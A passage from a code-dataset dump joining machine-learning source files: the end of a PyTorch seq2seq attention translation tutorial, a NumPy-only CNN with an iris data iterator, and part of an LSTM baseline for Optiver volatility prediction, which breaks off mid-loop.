attn = Attention(ENC_HID_DIM, DEC_HID_DIM)
enc = Encoder(INPUT_DIM, ENC_EMB_DIM, ENC_HID_DIM, DEC_HID_DIM, ENC_DROPOUT)
dec = Decoder(OUTPUT_DIM, DEC_EMB_DIM, ENC_HID_DIM, DEC_HID_DIM, DEC_DROPOUT, attn)
model = Seq2Seq(enc, dec, SRC_PAD_IDX, device).to(device)
def init_weights(m):
for name, param in m.named_parameters():
if 'weight' in name:
nn.init.normal_(param.data, mean=0, std=0.01)
else:
nn.init.constant_(param.data, 0)
model.apply(init_weights)
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
print(f'The model has {count_parameters(model):,} trainable parameters')
optimizer = optim.Adam(model.parameters())
TRG_PAD_IDX = TRG.vocab.stoi[TRG.pad_token]
criterion = nn.CrossEntropyLoss(ignore_index = TRG_PAD_IDX)
def train(model, iterator, optimizer, criterion, clip):
model.train()
epoch_loss = 0
for i, batch in enumerate(iterator):
src, src_len = batch.src
trg = batch.trg
optimizer.zero_grad()
output = model(src, src_len, trg)
# trg = [trg len, batch size]
# output = [trg len, batch size, output dim]
output_dim = output.shape[-1]
output = output[1:].view(-1, output_dim)
trg = trg[1:].view(-1)
# trg = [(trg len - 1) * batch size]
# output = [(trg len - 1) * batch size, output dim]
loss = criterion(output, trg)
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), clip)
optimizer.step()
epoch_loss += loss.item()
return epoch_loss / len(iterator)
def evaluate(model, iterator, criterion):
model.eval()
epoch_loss = 0
with torch.no_grad():
for i, batch in enumerate(iterator):
src, src_len = batch.src
trg = batch.trg
output = model(src, src_len, trg, 0) # turn off teacher forcing
# trg = [trg len, batch size]
# output = [trg len, batch size, output dim]
output_dim = output.shape[-1]
output = output[1:].view(-1, output_dim)
trg = trg[1:].view(-1)
# trg = [(trg len - 1) * batch size]
# output = [(trg len - 1) * batch size, output dim]
loss = criterion(output, trg)
epoch_loss += loss.item()
return epoch_loss / len(iterator)
def epoch_time(start_time, end_time):
elapsed_time = end_time - start_time
elapsed_mins = int(elapsed_time / 60)
elapsed_secs = int(elapsed_time - (elapsed_mins * 60))
return elapsed_mins, elapsed_secs
N_EPOCHS = 10
CLIP = 1
best_valid_loss = float('inf')
is_train = False
if is_train:
for epoch in range(N_EPOCHS):
start_time = time.time()
train_loss = train(model, train_iterator, optimizer, criterion, CLIP)
valid_loss = evaluate(model, valid_iterator, criterion)
end_time = time.time()
epoch_mins, epoch_secs = epoch_time(start_time, end_time)
if valid_loss < best_valid_loss:
best_valid_loss = valid_loss
torch.save(model.state_dict(), 'tut4-model.pt')
print(f'Epoch: {epoch + 1:02} | Time: {epoch_mins}m {epoch_secs}s')
print(f'\tTrain Loss: {train_loss:.3f} | Train PPL: {math.exp(train_loss):7.3f}')
print(f'\t Val. Loss: {valid_loss:.3f} | Val. PPL: {math.exp(valid_loss):7.3f}')
model.load_state_dict(torch.load('tut4-model.pt'))
test_loss = evaluate(model, test_iterator, criterion)
print(f'| Test Loss: {test_loss:.3f} | Test PPL: {math.exp(test_loss):7.3f} |')
def translate_sentence(sentence, src_field, trg_field, model, device, max_len=50):
model.eval()
if isinstance(sentence, str):
nlp = spacy.load('de')
tokens = [token.text.lower() for token in nlp(sentence)]
else:
tokens = [token.lower() for token in sentence]
tokens = [src_field.init_token] + tokens + [src_field.eos_token]
src_indexes = [src_field.vocab.stoi[token] for token in tokens]
src_tensor = torch.LongTensor(src_indexes).unsqueeze(1).to(device)
src_len = torch.LongTensor([len(src_indexes)])
with torch.no_grad():
encoder_outputs, hidden = model.encoder(src_tensor, src_len)
mask = model.create_mask(src_tensor)
trg_indexes = [trg_field.vocab.stoi[trg_field.init_token]]
attentions = torch.zeros(max_len, 1, len(src_indexes)).to(device)
for i in range(max_len):
trg_tensor = torch.LongTensor([trg_indexes[-1]]).to(device)
with torch.no_grad():
output, hidden, attention = model.decoder(trg_tensor, hidden, encoder_outputs, mask)
attentions[i] = attention
pred_token = output.argmax(1).item()
trg_indexes.append(pred_token)
if pred_token == trg_field.vocab.stoi[trg_field.eos_token]:
break
trg_tokens = [trg_field.vocab.itos[i] for i in trg_indexes]
return trg_tokens[1:], attentions[:len(trg_tokens) - 1]
def display_attention(sentence, translation, attention):
fig = plt.figure(figsize=(10, 10))
ax = fig.add_subplot(111)
attention = attention.squeeze(1).cpu().detach().numpy()
cax = ax.matshow(attention, cmap='bone')
ax.tick_params(labelsize=15)
x_ticks = [''] + ['<sos>'] + [t.lower() for t in sentence] + ['<eos>']
y_ticks = [''] + translation
ax.set_xticklabels(x_ticks, rotation=45)
ax.set_yticklabels(y_ticks)
ax.xaxis.set_major_locator(ticker.MultipleLocator(1))
ax.yaxis.set_major_locator(ticker.MultipleLocator(1))
plt.show()
plt.close()
example_idx = 12
src = vars(train_data.examples[example_idx])['src']
trg = vars(train_data.examples[example_idx])['trg']
print(f'src = {src}')
print(f'trg = {trg}')
translation, attention = translate_sentence(src, SRC, TRG, model, device)
print(f'predicted trg = {translation}')
display_attention(src, translation, attention)
example_idx = 14
src = vars(valid_data.examples[example_idx])['src']
trg = vars(valid_data.examples[example_idx])['trg']
print(f'src = {src}')
print(f'trg = {trg}')
translation, attention = translate_sentence(src, SRC, TRG, model, device)
print(f'predicted trg = {translation}')
display_attention(src, translation, attention)
example_idx = 18
src = vars(test_data.examples[example_idx])['src']
trg = vars(test_data.examples[example_idx])['trg']
print(f'src = {src}')
print(f'trg = {trg}')
translation, attention = translate_sentence(src, SRC, TRG, model, device)
print(f'predicted trg = {translation}')
display_attention(src, translation, attention)
from torchtext.data.metrics import bleu_score
def calculate_bleu(data, src_field, trg_field, model, device, max_len=50):
trgs = []
pred_trgs = []
for datum in data:
src = vars(datum)['src']
trg = vars(datum)['trg']
pred_trg, _ = translate_sentence(src, src_field, trg_field, model, device, max_len)
# cut off <eos> token
pred_trg = pred_trg[:-1]
pred_trgs.append(pred_trg)
trgs.append([trg])
return bleu_score(pred_trgs, trgs)
bleu_score_ = calculate_bleu(test_data, SRC, TRG, model, device)
print(f'BLEU score = {bleu_score_*100:.2f}')
``` |
{
"source": "7568/examples",
"score": 3
} |
#### File: w7-v2/no_pytorch/data_iter.py
```python
import random
class IrisDataIter:
"""
迭代器
"""
def __init__(self, m, bach):
random.shuffle(m)
self.data = m
self.bach = bach
self.length = len(m)
self.index = -1
def __iter__(self):
return self
def __next__(self):
if self.index < self.length - 1:
self.index += 1
_start = self.index * self.bach
if _start >= self.length:
raise StopIteration
_end = (self.index + 1) * self.bach
if _end > self.length:
_end = self.length
_start = _end - self.bach # 最后一波直接取最后bach个元素
_train_index = self.data[_start: _end]
return _train_index
else:
raise StopIteration
```
#### File: w7-v2/no_pytorch/my_first_cnn.py
```python
import numpy as np
import time
class BasicModule(object):
l_r = 0
def __init__(self):
raise NotImplementedError
def forward(self, x_i):
raise NotImplementedError
def backward(self, grad_H):
raise NotImplementedError
class LinearLayer(BasicModule):
def __init__(self, input_num, output_num):
"""
线性层层,实现 X 和 W 的矩阵乘法运算
:param input_num: 神经元的输入参数个数,即input的属性的维度
:param output_num: 该层神经元的个数
"""
self.prev_data = None
self.input_num = input_num
self.output_num = output_num
# W : weight + bias , weight:length of feature x output number , bias:1 x output number
self.W = np.random.normal(0, 1, (input_num + 1, output_num)) / np.sqrt((input_num + 1) / 2)
def forward(self, prev_data):
"""
:param prev_data: row:length of feature , column: bach
:return:
"""
self.prev_data = prev_data
prev_data_new = np.concatenate((prev_data, np.ones((1, prev_data.shape[1]))), axis=0)
H = self.W.T @ prev_data_new
return H
def backward(self, grad):
new_grad = self.W @ grad
grad_w = self.prev_data @ grad.T
grad_w = np.concatenate((grad_w, np.ones((1, grad_w.shape[1]))), axis=0)
self.W -= BasicModule.l_r * (grad_w / self.prev_data.shape[1])
return new_grad[0:-1, :] # , grad_W
class Conv2d(BasicModule):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0):
"""
为方便计算统一步长为1
:param input_num:
:param output_num:
"""
self.last_input = None
self.input = None
self.output = None
self.input_padded = None
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.filters = np.random.randn(out_channels, in_channels, kernel_size, kernel_size) / (kernel_size ** 2)
self.filters2 = self.filters
self.filters = self.filters.flatten()
self.filters = self.filters.reshape(out_channels, in_channels * kernel_size * kernel_size)
self.filters3 = self.filters.reshape(1,out_channels, in_channels * kernel_size * kernel_size)
self.bias = None
def forward(self, input, filters=None):
"""
input 为 b,n,h,w ,当input与filters进行卷积的时候,将卷积操作转换成向量的乘法操作
:param input:
:param filters:
:return:
"""
self.input = input
input_padded = np.pad(input, ((0, 0), (0, 0), (self.padding, self.padding), (self.padding, self.padding)),
'constant')
self.input_padded = input_padded
b0, n0, h0, w0 = input_padded.shape
out_size = (np.array([h0, w0]) - self.kernel_size + 1) / self.stride
output = np.zeros((b0, self.out_channels, int(out_size[0]), int(out_size[1])))
list_flatted_input = list()
row_numbers = int(out_size[0]) * int(out_size[1])
for h in range(int(out_size[0])):
for w in range(int(out_size[1])):
x_slice = input_padded[:, :, h * self.stride:h * self.stride + self.kernel_size,
w * self.stride:w * self.stride + self.kernel_size]
list_flatted_input.append(x_slice)
flatted_input2 = np.asarray(list_flatted_input).reshape(row_numbers, b0,
self.in_channels * self.kernel_size * self.kernel_size)
flatted_input = np.swapaxes(flatted_input2, 0, 1)
self.last_input = flatted_input
_output = np.zeros((b0, self.out_channels, flatted_input.shape[1]))
if self.bias is None:
self.bias = np.random.randn(self.out_channels, row_numbers)
#
for bb in range(b0):
_output[bb, :, :] = self.filters @ flatted_input[bb, :, :].T
output = _output.reshape(b0, self.out_channels, int(out_size[0]), int(out_size[1]))
return output
def backward(self, grad_pre):
'''
:param grad_pre:
:return:
'''
# xb, xn, xh, xw = self.input.shape
# 由于forward里面的卷积是用的矩阵乘法的方式,所以先将grad_pre转化成为flatted_input的结构
o, c, h, w = grad_pre.shape
grad_pre = grad_pre.reshape((o, c, h * w))
dF = np.zeros(self.filters.shape)
db = np.zeros(self.bias.shape)
_dX = np.zeros(self.last_input.shape)
for bb in range(o):
dF += grad_pre[bb, :, :] @ self.last_input[bb, :, :]
db += grad_pre[bb, :, :]
_dX[bb, :, :] = (self.filters.T @ grad_pre[bb, :, :]).T
self.filters -= BasicModule.l_r * dF / o
self.bias -= BasicModule.l_r * db / o
# 剔除掉_dX中重复数据,方法是跟卷积操作形式一样,原来是一步一步的取小方格,现在是从_dX中获得小方格一步一步的放回去
pb, pn, ph, pw = self.input_padded.shape
dX = np.zeros(self.input.shape)
out_size = (np.array([ph, pw]) - self.kernel_size + 1) / self.stride
padding_x2 = np.zeros((pb, pn, ph, pw))
_dX2 = np.swapaxes(_dX, 0, 1)
count = 0
for h in range(int(out_size[0])):
for w in range(int(out_size[1])):
k = _dX2[count, :, :].reshape(pb, self.in_channels, self.kernel_size, self.kernel_size)
padding_x2[:, :, h * self.stride:h * self.stride + self.kernel_size,
w * self.stride:w * self.stride + self.kernel_size] = k
count += 1
padding_x = padding_x2
# 去掉padding的部分
dX[:, :, :, :] = padding_x[:, :, self.padding:ph - self.padding, self.padding:pw - self.padding]
return dX
class Flatting(BasicModule):
def __init__(self):
"""
# 实现 sigmoid 激活函数
"""
self.prev_data = None
def forward(self, prev_data):
self.prev_data = prev_data
flated = prev_data.flatten()
flated = flated.reshape(prev_data.shape[0], int(flated.shape[0] / prev_data.shape[0]))
return flated.T
def backward(self, grad_b):
"""
:param grad_b: row : features number , column : bach size
:return:
"""
grad_b = grad_b.T
grad_b = grad_b.reshape(self.prev_data.shape)
return grad_b
class Relu(BasicModule):
def __init__(self):
self.prev_data = None
self.filter = None
def forward(self, prev_data):
self.prev_data = prev_data
self.filter = (prev_data > 0).astype(np.float32)
# result = np.where(prev_data > 0, prev_data, np.zeross_like(prev_data))
result = self.filter * prev_data
return result
def backward(self, grad_b):
result = self.filter * grad_b
return result
class MaxPool2d(BasicModule):
def __init__(self, kernel_size):
self.kernel_size = kernel_size
self.output = None
self.max_pool_for_back = None
def forward(self, prev_data):
self.prev_data = prev_data
bach, num_filters, h, w = prev_data.shape
k_s = self.kernel_size
if h % k_s != 0 or w % k_s != 0:
print('MaxPool2d 参数错误!')
new_h = h // k_s
new_w = w // k_s
# 先获得到要用来比较大小的块,拉成向量,再获得每个向量中的最大值
max_indexs = list()
for i in range(new_h):
for j in range(new_w):
im_region = prev_data[:, :, (i * k_s):(i * k_s + k_s), (j * k_s):(j * k_s + k_s)]
max_indexs.append(im_region)
row_number = bach * num_filters * new_h * new_w
max_pool_for_back2 = np.asarray(max_indexs).reshape(row_number, k_s ** 2)
max_index2 = np.concatenate((np.arange(row_number), np.argmax(max_pool_for_back2, axis=1))).reshape(2,
row_number)
max_index2 = tuple(max_index2)
max_index3 = max_pool_for_back2[max_index2]
max_index3 = max_index3.reshape(new_h, new_w, num_filters * bach)
max_index3 = np.swapaxes(max_index3, 1, 2)
max_index3 = np.swapaxes(max_index3, 0, 1)
max_index3 = max_index3.reshape(bach, num_filters, new_h, new_w, )
output = max_index3
# 将最大值的位置记录下来,方便反向求导的时候使用
max_pool_for_back2[:, :] = 0
max_pool_for_back2[max_index2] = 1
max_pool_for_back23 = max_pool_for_back2.reshape(bach, num_filters, h, w)
max_pool_for_back = max_pool_for_back23
self.max_pool_for_back = max_pool_for_back
self.output = output
return output
def backward(self, grad_p):
"""
新建一个与原输入一样大的tensor,然后将愿输入中对应区域最大值的位置,设置为1,然后将该tensor乘以grad_p
一个简单的做法就是,然后将愿输入中对应区域最大值的位置,设置为grad_p对应的位置的值
:param grad_b:
:return:
"""
grad_p = np.repeat(grad_p, self.kernel_size, axis=2)
grad_p = np.repeat(grad_p, self.kernel_size, axis=3)
new_grad_p = self.max_pool_for_back * grad_p
return new_grad_p
class Dropout(BasicModule):
def __init__(self, p=0.25):
"""实现 dropout2d 激活函数"""
self.forward_output = None
self.p = p
self.filters = None
def forward(self, prev_data):
tmp = np.zeros( prev_data.shape)
if np.ndim(prev_data) == 2:
b, l = prev_data.shape
tmp[0] = np.random.rand(1, l)
self.filters = (np.random.rand(b, l) > self.p).astype(np.float32)
elif np.ndim(prev_data) == 3:
b, c, l = prev_data.shape
tmp[0] = np.random.rand(1, c, l)
self.filters = (np.random.rand(b, c, l) > self.p).astype(np.float32)
else:
b, c, h, w = prev_data.shape
tmp[0] = np.random.rand(1, c, h, w)
self.filters = (np.random.rand(b, c, h, w) > self.p).astype(np.float32)
for i in range(1,prev_data.shape[0]):
tmp[i] = tmp[0]
self.filters = (tmp > self.p).astype(np.float32)
result = prev_data * self.filters
return result
def backward(self, grad_b):
result = grad_b * self.filters
return result
class Softmax(BasicModule):
def __init__(self):
"""实现 Softmax 激活函数"""
self.forward_output = None
self.epsilon = 1e-12 # 防止求导后分母为 0
def forward(self, prev_data):
p_exp = np.exp(prev_data - np.max(prev_data, axis=0))
# p_exp = np.exp(prev_data)
denominator = np.sum(p_exp, axis=0, keepdims=True)
self.forward_output = p_exp / denominator
return self.forward_output
def backward(self, grad_b):
"""
:param grad_b:
:return:
https://themaverickmeerkat.com/2019-10-23-Softmax/
"""
# forward_output = self.forward_output
# _input_grad = np.array([])
# c = forward_output.shape[0]
# for i in range(forward_output.shape[1]):
# _forward_output = forward_output[:, i]
# d_softmax = _forward_output * np.identity(c) - _forward_output.reshape(c, 1) @ _forward_output.reshape(1, c)
# input_grad = grad_b[:, i] @ d_softmax
# _input_grad = np.append(_input_grad, input_grad)
# _input_grad = _input_grad.reshape(int(_input_grad.shape[0] / c), c)
#
# return _input_grad.T
return grad_b
# 实现交叉熵损失函数
class CrossEntropy(BasicModule):
def __init__(self):
self.pre_data = None
self.epsilon = 1e-12 # 防止求导后分母为 0
def forward(self, prev_data, y):
self.pre_data = prev_data
log_p = np.log(prev_data + self.epsilon)
result = np.mean(np.sum(-y * log_p, axis=0))
return result
def backward(self, y):
p = self.pre_data
# return -y * (1 / (p + self.epsilon))
result = p - y
return result
# 实现均方误差损失函数
class MeanSquaredError(BasicModule):
def __init__(self):
self.mem = {}
def forward(self, p, y):
"""
:param p: 神经网络最后一层输出的结果
:param y: 真实标签
:return:
"""
self.mem['p'] = p
return (y - p) * (y - p) / 2
def backward(self, y):
p = self.mem['p']
return y - p
# 搭建全连接神经网络模型
class FirstNet(BasicModule):
def __init__(self, l_r):
self.pre_loss = 0
BasicModule.l_r = l_r
self.head = [
[Conv2d(1, 1, 3, padding=1),
Relu()],
[Conv2d(1, 1, 3, padding=1),
Relu()],
[Conv2d(1, 1, 3, padding=1),
Relu()],
[Conv2d(1, 1, 3, padding=1),
Relu()],
[Conv2d(1, 1, 3, padding=1),
Relu()],
[Conv2d(1, 1, 3, padding=1),
Relu()],
[Conv2d(1, 1, 3, padding=1),
Relu()],
]
self.hides = [
Conv2d(1, 32, 5,padding=4),
Relu(),
Conv2d(32, 64, 5, padding=2),
Relu(),
MaxPool2d(2),
Dropout(),
Flatting(),
LinearLayer(16384, 256),
Relu(),
Dropout(0.5),
LinearLayer(256, 10),
Softmax()]
# self.hides = [
# Conv2d(1, 16, 5, padding=2),
# Relu(),
# Conv2d(16, 32, 5, padding=2),
# Relu(),
# Conv2d(32, 64, 5, padding=2),
# Dropout(0.1),
# MaxPool2d(2),
# Relu(),
# Conv2d(64, 128, 5, padding=2),
# Relu(),
# Conv2d(128, 256, 5, padding=2),
# Dropout(0.1),
# MaxPool2d(2),
# Relu(),
# Flatting(),
# LinearLayer(12544, 10),
# Softmax()]
self.error_measure = CrossEntropy()
def forward(self, x, labels):
# x = np.array(x, dtype=float)
# x = (x - np.mean(x, axis=(2, 3), keepdims=True)) / np.std(x, axis=(2, 3), keepdims=True) # 将x进行标准化操作
# b0, n0, h0, w0 = x.shape
# head_layels = np.zeros((b0, len(self.head) + 1, h0, w0))
# head_layels[:, 0:1, :, :] = x[:, :, :, :]
# count = 1
# for n in self.head:
# x = n[0].forward(x)
# x = n[1].forward(x)
# head_layels[:, count:count + 1, :, :] = x
# count += 1
# x = head_layels.reshape(b0, len(self.head) + 1, 28, 28)
for n in self.hides:
x = n.forward(x)
loss = self.error_measure.forward(x, labels)
self.pre_loss = loss
return x, loss
def predict(self, x, labels):
for n in self.hides:
if n.__class__.__name__=='Dropout':
continue
x = n.forward(x)
loss = self.error_measure.forward(x, labels)
self.pre_loss = loss
return x, loss
def backward(self, labels):
loss_grad = self.error_measure.backward(labels)
for n in reversed(self.hides):
loss_grad = n.backward(loss_grad)
# for l in range(1, loss_grad.shape[1]):
# _loss_grad = loss_grad[:, l:l + 1, :, :]
# for n in reversed(self.head[0:l]):
# _loss_grad = n[1].backward(_loss_grad)
# _loss_grad = n[0].backward(_loss_grad)
``` |
{
"source": "7568/ORVP",
"score": 2
} |
#### File: 7568/ORVP/v2-pytorch-baseline.py
```python
import os
import gc
import glob
import torch
from torch import nn
import torch.nn.functional as F
import torch.optim as optim
import numpy as np
import pandas as pd
import time
from itertools import islice
from torch.utils.data import Dataset, DataLoader
from multiprocessing import Pool
from sklearn.preprocessing import MinMaxScaler, StandardScaler
from sklearn.model_selection import train_test_split
from torch.utils.tensorboard import SummaryWriter
from tqdm.auto import tqdm
import logging
import resource
rlimit = resource.getrlimit(resource.RLIMIT_NOFILE)
resource.setrlimit(resource.RLIMIT_NOFILE, (2048, rlimit[1]))
datefmt = '%Y-%m-%d %H:%M:%S'
logging.basicConfig(filename='pytorch-baseline.log', filemode='w', format='%(asctime)s - %(levelname)s - %(message)s',
datefmt=datefmt, level=logging.DEBUG)
# import tqdm
tqdm.pandas()
import warnings
from multiprocessing import cpu_count
def get_path_dict(f, v):
f_dict = {}
for i in tqdm(v):
fpath = f'{f}/stock_id={i}'
flist = glob.glob(os.path.join(fpath, '*.parquet'))
if len(flist) > 0:
f_dict[i] = flist[0]
return f_dict
# train_idx, valid_idx = train_test_split(train_ds['row_id'], shuffle=True, test_size=0.1, random_state=SEED)
# ds: train.csv里面的数据 f_dict:是 book_train.parquet 里面的数据
def process_optiver_ds(ds, f_dict, skip_cols, t_dict):
x = []
y = []
full_seconds_in_bucket = {'seconds_in_bucket': np.arange(600)}
full_seconds_in_bucket = pd.DataFrame(full_seconds_in_bucket)
for stock_id, stock_fnmame in tqdm(f_dict.items()):
trade_train_ = t_dict.get(stock_id)
trade_train_ = pd.read_parquet(trade_train_)
optiver_ds = pd.read_parquet(stock_fnmame)
time_ids = optiver_ds['time_id'].unique()
for time_id in time_ids:
optiver_ds_ = optiver_ds[optiver_ds['time_id'] == time_id]
optiver_ds_ = pd.merge(full_seconds_in_bucket, optiver_ds_, how='left', on='seconds_in_bucket')
optiver_ds_ = pd.merge(optiver_ds_, trade_train_[trade_train_['time_id'] == time_id], how='left',
on='seconds_in_bucket')
# optiver_ds_.drop(skip_cols)
optiver_ds_.drop(['time_id_x', 'time_id_y'], axis=1)
optiver_ds_ = np.nan_to_num(optiver_ds_)
row_id = str(stock_id) + '-' + time_id.astype(str)
r = ds[ds['row_id'] == row_id]['target']
x.append(optiver_ds_)
y.append(r)
return x, y
def chunks(data, SIZE=10000):
it = iter(data)
for i in range(0, len(data), SIZE):
yield {k: data[k] for k in islice(it, SIZE)}
def process_book_train_chunk(chunk_ds):
return process_optiver_ds(train_ds, chunk_ds, book_skip_columns, trade_train_dict)
def process_book_test_chunk(chunk_ds):
return process_optiver_ds(test_ds, chunk_ds, book_skip_columns, trade_test_dict)
'''
# 将样本分成4块,每块里面有28条数据
book_train_chunks = [i for i in chunks(book_train_dict, int(len(book_train_dict) / NTHREADS))]
# trade_train_chunks = [i for i in chunks(trade_train_dict, int(len(trade_train_dict) / NTHREADS))]
z = 1 if len(book_test_dict) < NTHREADS else NTHREADS
book_test_chunks = [i for i in chunks(book_test_dict, int(len(book_test_dict) / z))]
# trade_test_chunks = [i for i in chunks(trade_test_dict, int(len(trade_test_dict) / z))]
pool = Pool(NTHREADS) # 创建进程池,最大进程数为 NTHREADS
r = pool.map(process_book_train_chunk, book_train_chunks)
pool.close()
a1, a2 = zip(*r)
pool = Pool(NTHREADS) # 创建进程池,最大进程数为 NTHREADS
r = pool.map(process_book_test_chunk, book_test_chunks)
pool.close()
t_a1, t_a2 = zip(*r)
np_train = a1
np_target = a2'''
# Scaler
# transformers = []
# for i in tqdm(range(np_train.shape[1])):
# a = np.nan_to_num(np_train[train_idx])
# b = np.nan_to_num(np_train[valid_idx])
#
# transformer = StandardScaler() # StandardScaler is very useful!
# np_train[train_idx] = transformer.fit_transform(a)
# np_train[valid_idx] = transformer.transform(b)
# transformers.append(transformer) # Save Scalers for the inference stage
class LSTMModel(nn.Module):
"""Container module with an encoder, a recurrent module, and a decoder."""
def __init__(self, ntoken, ninp, nhid, nlayers, dropout=0.1):
super(LSTMModel, self).__init__()
# self.drop = nn.Dropout(dropout)
# self.encoder = nn.Embedding(ntoken, ninp)
self.rnn = nn.LSTM(ninp + input_features_num, nhid + input_features_num, nlayers, dropout=dropout,
batch_first=True, bidirectional=True)
self.regress_rnn = nn.Sequential(
nn.BatchNorm1d(2 * nhid + 2 * input_features_num),
nn.Linear(2 * nhid + 2 * input_features_num, 1),
nn.Sigmoid()
)
self.decoder = nn.Sequential(
nn.BatchNorm1d(3 * nhid + 2 * input_features_num),
nn.Linear(3 * nhid + 2 * input_features_num, nhid + input_features_num),
nn.ReLU(),
nn.Dropout(0.2),
nn.BatchNorm1d(nhid + input_features_num),
nn.Linear(nhid + input_features_num, ntoken),
nn.ReLU(),
nn.Dropout(0.1),
nn.BatchNorm1d(ntoken),
nn.Linear(ntoken, 1),
nn.Sigmoid()
)
self.self_attention = nn.Sequential(
nn.Linear(3 * nhid + 2 * input_features_num, 10 * (nhid + input_features_num)),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(10 * (nhid + input_features_num), 10 * (nhid + input_features_num)),
nn.ReLU(),
nn.Dropout(0.2),
nn.Linear(10 * (nhid + input_features_num), 3 * nhid + 2 * input_features_num),
nn.Softmax(dim=1)
)
# self.decoder_1 = nn.Linear(nhid, ntoken)
# self.decoder_2 = nn.Linear(ntoken, 1)
self.conv1d_relu_stack = nn.Sequential(
nn.Conv1d(in_channels=600, out_channels=1200, kernel_size=3),
nn.Dropout(0.1),
nn.ReLU(), # 9
nn.Conv1d(in_channels=1200, out_channels=1200, kernel_size=3),
nn.Dropout(0.2),
nn.ReLU(), # 7
nn.Conv1d(in_channels=1200, out_channels=1200, kernel_size=3),
nn.Dropout(0.2),
nn.ReLU(), # 5
nn.Conv1d(in_channels=1200, out_channels=600, kernel_size=3),
nn.Dropout(0.1),
nn.ReLU(), # 3
nn.Conv1d(in_channels=600, out_channels=nhid, kernel_size=3),
nn.ReLU(), # 1
)
self.regress_conv = nn.Sequential(
nn.BatchNorm1d(nhid),
nn.Linear(nhid, 1),
nn.Sigmoid()
)
self.linear_relu_stack = nn.Sequential(
nn.Linear(input_features_num, ntoken),
nn.Dropout(0.1),
nn.ReLU(),
nn.Linear(ntoken, ninp),
nn.Dropout(0.2),
nn.ReLU(),
nn.Linear(ninp, ninp),
nn.Dropout(0.2),
nn.ReLU(),
)
self.ninp = ninp
self.nhid = nhid
self.nlayers = nlayers
def forward(self, input):
# emb = self.drop(self.encoder(input))
cov_logits = self.conv1d_relu_stack(input)
cov_logits = cov_logits.view(cov_logits.shape[0], cov_logits.shape[1])
regress_conv_out = self.regress_conv(cov_logits)
logits = self.linear_relu_stack(input)
logits = torch.cat((logits, input), 2)
# logits = logits.view(1, len(logits), -1)
output, hidden = self.rnn(logits)
output = output[:, -1, :]
regress_rnn_out = self.regress_rnn(output)
new_logits = torch.cat((cov_logits, output), 1)
# attention_output = self.self_attention(new_logits)
# output = self.drop(output)
new_logits = torch.mul(new_logits, self.self_attention(new_logits))
# decoded_out = self.decoder(new_logits)
decoded_out = self.decoder(new_logits)
# decoded_2 = self.decoder_2(decoded_1)
return regress_conv_out, regress_rnn_out, decoded_out
def init_hidden(self, bsz):
weight = next(self.parameters())
return (weight.new_zeros(self.nlayers, bsz, self.nhid),
weight.new_zeros(self.nlayers, bsz, self.nhid))
# dataloader = DataLoader(transformed_dataset, batch_size=4,
# shuffle=True, num_workers=0)
def rmspe(y_pred,y_true):
rms = np.sqrt(np.mean(np.square((y_true - y_pred) / y_true)))
return rms
def RMSPELoss(y_pred, y_true):
return torch.sqrt(torch.mean(((y_true - y_pred) / y_true) ** 2)).clone()
def do_process(optiver_ds, full_seconds_in_bucket, trade__, time_id):
optiver_ds_ = optiver_ds[optiver_ds['time_id'] == time_id]
if optiver_ds_.size == 0:
return None
optiver_ds_ = pd.merge(full_seconds_in_bucket, optiver_ds_, how='left', on='seconds_in_bucket')
optiver_ds_ = pd.merge(optiver_ds_, trade__[trade__['time_id'] == time_id], how='left',
on='seconds_in_bucket')
# optiver_ds_.drop(skip_cols)
optiver_ds_ = optiver_ds_.drop(['time_id_x', 'time_id_y', 'seconds_in_bucket'], axis=1)
optiver_ds_ = np.nan_to_num(optiver_ds_)
# TODO 将每一列进行标准化
for i in range(optiver_ds_.shape[1]):
if np.sum(optiver_ds_[:, i]) != 0 and np.std(optiver_ds_[:, i]) != 0:
optiver_ds_[:, i] = (optiver_ds_[:, i] - np.mean(optiver_ds_[:, i])) / np.std(optiver_ds_[:, i])
return optiver_ds_
def process_train_bach(arg):
# input_0 = []
# target_0 = []
stock_id = arg['stock_id']
time_id = arg['time_id']
# optiver_ds = arg['optiver_ds']
# full_seconds_in_bucket = arg['full_seconds_in_bucket']
# trade_train_ = arg['trade_train_']
path = f"{DATA_PATH}formated_data/{stock_id}/"
optiver_ds_ = pd.read_parquet(f'{path}{time_id}.parquet').to_numpy()
# row_id = str(stock_id) + '-' + time_id.astype(str)
np_target = pd.read_parquet(f'{path}{time_id}_target.parquet')['target'].to_numpy()
return optiver_ds_, np_target[0]
def process_test_bach(time_id, ARGS):
optiver_ds = ARGS['optiver_ds']
full_seconds_in_bucket = ARGS['full_seconds_in_bucket']
trade_test_ = ARGS['trade_test_']
optiver_ds_ = do_process(optiver_ds, full_seconds_in_bucket, trade_test_, time_id)
return optiver_ds_
def train_bach(epoch):
# lstmmodel.load_state_dict(torch.load('train_out/model_weights_240.pth'))
full_seconds_in_bucket = {'seconds_in_bucket': np.arange(600)} # seconds_in_bucket最大是600,训练数据中不连续,这里将他们连起来
full_seconds_in_bucket = pd.DataFrame(full_seconds_in_bucket)
# lstmmodel.zero_grad()
# pool = Pool(30) # 创建进程池,最大进程数为 NTHREADS
for stock_id, stock_fnmame in book_train_dict.items():
trade_train_parquet = trade_train_dict.get(stock_id)
trade_train_ = pd.read_parquet(trade_train_parquet)
book_train = pd.read_parquet(stock_fnmame)
loss_0_each_stock = []
loss_1_each_stock = []
loss_2_each_stock = []
loss_each_stock = []
output_each_stock = []
target_each_stock = []
each_stock_train_data = {}
time_ids = book_train['time_id'].unique()
params = []
# time_ids=time_ids[1:20]
# 每次将已经格式化好了的一个stock中的数据全部取出
for time_id in tqdm(time_ids):
ARGS_ = dict(optiver_ds=book_train, full_seconds_in_bucket=full_seconds_in_bucket,
trade_train_=trade_train_, stock_id=stock_id, time_id=time_id)
params.append(ARGS_)
# input_, target_ = process_train_bach(ARGS_)
# each_stock_train_data[time_id] = dict(input_=input_, target_=target_)
with Pool(8) as p:
r = p.map(process_train_bach, params)
input_, target_ = zip(*r)
for i in range(len(time_ids)):
each_stock_train_data[time_ids[i]] = dict(input_=input_[i], target_=target_[i])
# 每次取一个小bach,分多次取
for i in tqdm(range(int(len(time_ids) / 20))):
time_ids = np.random.choice(time_ids, 50)
input_0 = []
target_0 = []
for time_id in time_ids:
